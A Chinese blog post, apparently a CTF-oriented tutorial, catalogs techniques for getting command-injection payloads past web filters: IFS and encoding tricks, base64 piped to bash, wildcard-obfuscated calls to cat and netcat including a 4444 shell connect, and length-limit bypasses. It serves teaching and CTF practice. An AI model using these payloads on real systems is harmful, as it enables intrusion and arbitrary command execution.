cat命令读取一部分_命令注入绕过方式总结

最新推荐文章于 2023-04-18 16:43:02 发布
最新推荐文章于 2023-04-18 16:43:02 发布
阅读量1.8k 收藏 9
点赞数 1
文章标签: cat命令读取一部分
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42373789/article/details/113451481
版权

前言

命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。

常用符号

分号(;)

多条语句顺序执行时的分割符号。

1
cmd1;cmd2

管道符(|)

cmd1命令的输出,作为下一条命令cmd2的参数。

1
cmd1|cmd2

and(&&)

与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2

1
cmd1 && cmd2

or(||)

或命令,cmd1失败则执行cmd2,cmd1成功则不执行cmd2

1
cmd1 || cmd2
反引号()和$()

反引号和$()都可用来表示命令,被这两种方式包含的字符串都会被当做命令首先执行。

12
echo "result : `whoami`"echo "result : $(whoami)"

绕过方式总结

空格绕过

在过滤了空格的系统中,以cat flag.txt为例,系统不允许我们输入空格或输入后被过滤。

${IFS}

可使用${IFS}代替空格。

123
cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt
重定向符绕过(<>)
12
cat<>flag.txtcat
%09(需要php环境)

php环境下web输入%09等效于空格

1
cat%09flag.txt

黑名单绕过

拼接

使用shell变量拼接被黑名单限制的关键词

1
a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;
base64

使用反引号包含base64解码后的命令

1
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`

将base64解码后的命令通过管道符传递给bash

1
echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash

单引号,双引号

1
c""at fl''ag.tx""t
反斜杠
1
c\at fl\a\g.tx\t
$1
1
ca$1t fl$1ag.t$1xt

读文件绕过

123456789101112
(1)more:一页一页的显示档案内容(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页(3)head:查看头几行(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示(5)tail:查看尾几行(6)nl:显示的时候,顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器,这个也可以查看(9)vim:一种编辑器,这个也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容

通配符绕过

/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。

1
/???/?[a][t] ?''?''?''?''?''?''?''?''

同理,我们也可以匹配/bin下的其他命令,如more,less,vi,tail等命令来查看文件,或者执行其他命令。

1
/???/[m][o]?[e] ?''?''?''?''?''?''?''?''
1
/???/[t]?[i][l] ?''?''?''?''?''?''?''?''

甚至开启一个shell

1
/???/[n]?[t]??[t] -lvp 4444
1
/???/[n]?[t]??[t] 192.168.1.3 4444

命令嵌套

1
echo "result:`whoami`"
1
echo "result:$(uname -a)"

长度绕过

使用>>绕过长度限制

使用>>每次添加一部分命令到文件中

1234
echo -n "cmd1" > r;echo -n "cmd2" >> r;echo -n "cmd3" >> r;echo "cmd4" >> r;

然后使用cat r | bash执行命令

使用换行执行和ls -t绕过长度限制

linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加\,如文件a中有

123
ca\t flag.t\xt

使用sh a即可执行命令cat flag.txt

ls -t可根据时间创建顺序逆序输出文件名

a可以创建一个名为a的文件

按照这个思路,可以使用

1234
> "ag"> "fl\\"> "t \\"> "ca\\"

然后使用ls -t > s

s中文件内容就是

123456
sca\t \fl\ag\其他的无关内容

之后使用sh s,即可执行cat flag

作者:Leticia,来源:Leticia's Blog

扫描关注乌云安全

fd7e2d79a91659d2f00324d347a105ef.png

觉得不错点个“赞”、“在看”哦

十三德州解说
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个简单的linux命令 cat
01-11
这个命令常用来显示文件内容,或者将几个文件连接起来显示,或者从标准输入读取内容并显示,它常与重定向符号配合使用。 命令格式 cat [选项] [文件]… 命令功能 cat主要有三大功能: 1.一次显示整个文件:cat ...
绕过cat|/ flag
m0_61011147的博客
09-06 1881
绕过cat|/ flag
【Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5436
ctf命令执行题型解题方法汇总(持续更新中)
看一眼就学会的命令执行绕过小妙招
真正的大师,永远都怀着一颗学徒的心。
12-30 3197
文章目录前言简单介绍下漏洞执行漏洞:一、命令执行的利用二、有趣的点来了原版:小妙招版 前言 简单介绍下漏洞执行漏洞: 命令执行(Command Execution)漏洞即我们可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等。 提示:以下是本篇文章正文内容,下面案例可供参考 一、命令执行的利用 在这.
CTF之命令执行常见绕过
最新发布
qq_42383069的博客
04-18 4755
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
linux中查看文件命令和空格绕过
m0_56059226的博客
06-18 2166
由于做了[WUSTCTF2020]朴实无华这道题目,整理一下除了cat还可以用哪些命令打开文件 cat由第一行开始显示文件内容 tac从最后一行开始显示,可以看出 tac 是 cat 的倒著写! nl 显示的时候,顺道输出行号! more 一页一页的显示文件内容 less 与 more 类似,但是比 more 更好的是,他可以往前翻页! head 只看头几行 tail 只看尾巴几行 ...
Linux cat命令用法详解
01-09
Linux cat命令 cat 命令用于连接文件并打印到标准输出设备上。 使用权限 所有使用者 语法格式 cat [-AbeEnstTuv] [--help] [--version] fileName 参数说明: -n 或 –number:由 1 开始对所有输出的行数编号。 -b...
CAT.zip_RAW_matlab读取raw_raw图像 matlab_raw读取_读取raw格式
07-14
针对图像处理中常用的RAW文件格式,用MATLAB读取这类文件
cat命令 在终端设备上显示文件内容
01-20
cat这个命令也很好记,因为cat在英语中是“猫”的意思,小猫咪是不是给您一种娇小、可爱的感觉呢? 注意:当文件内容较大时,文本内容会在屏幕上快速闪动(滚屏),用户往往看不清所显示的具体内容。因此对于较长...
用shell命令读取与输出数据的代码
01-20
shell脚本读取数据有以下几种方式:1.键盘输入,默认2.从文件中读取3.通过管道命令传递 echo的功能:\c :不换行\f :进纸\t :跳格\n :换行\表示转义,例如:”\”/dev/rmt0″\”翻译为,”/dev/rmt0″ read:从键盘或...
命令执行各种绕过总结
m0_64815693的博客
10-11 8407
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
CTF自学笔记
u011005040的博客
06-21 1992
CTF自学笔记第一章:课程介绍与环境搭建1.课程介绍2.环境搭建第二章:CTF训练 SSH服务1.CTF-SSH私钥泄露信息探测分析探测结果探测大端口的信息 第一章:课程介绍与环境搭建 1.课程介绍 CTF比较中涉及内容比较复杂,我们要利用所有可以利用的资源获取flag。 2.环境搭建 安装软件:(都是数据库软件) vmware workstation 14 Virtual box 测试靶场网络环境: 1.使用 netdiscover -r ip/netmask 嗅探靶场IP (例:netdiscove
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2568
一文初入命令执行漏洞
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
命令执行绕过的练习(一)
qwzf
08-12 1697
0x00 前言 总结命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。 0x01 GKCTF-Check_In 题目源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
命令执行漏洞各种绕过方式
m0re's blog
07-10 7041
本文目录前言命令执行漏洞绕过方式管道符windows中常见管道符linux中常见管道符空格过滤黑名单绕过通配符绕过内敛执行绕过编码绕过绕过长度限制`>`和`>>`两个符号的使用命令换行最后参考文章 前言 刚做了一道题,是有关命令执行漏洞的,里面过滤的内容比较多,一时间找不到头绪,所以学习一下关于命令执行漏洞的绕过方式,以便以后遇到不会像现在这样一点思路都没有。 命令执行漏洞绕过方式 管道符 windows中常见管道符 | 直接执行后面的语句 || 如果前面命令是错的那么就执行后面的语句
MISC解题思路总结(一)XCTF平台
gou1791241251的博客
08-02 3221
CTF中的misc解题思路
如何用cat命令读取一个txt文件的前100行
03-22
可以使用以下命令读取一个txt文件的前100行: cat filename.txt | head -100 其中,cat命令用于将文件内容输出到终端,head命令用于显示文件的前几行。通过管道符将两个命令连接起来,就可以实现读取文件前100行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值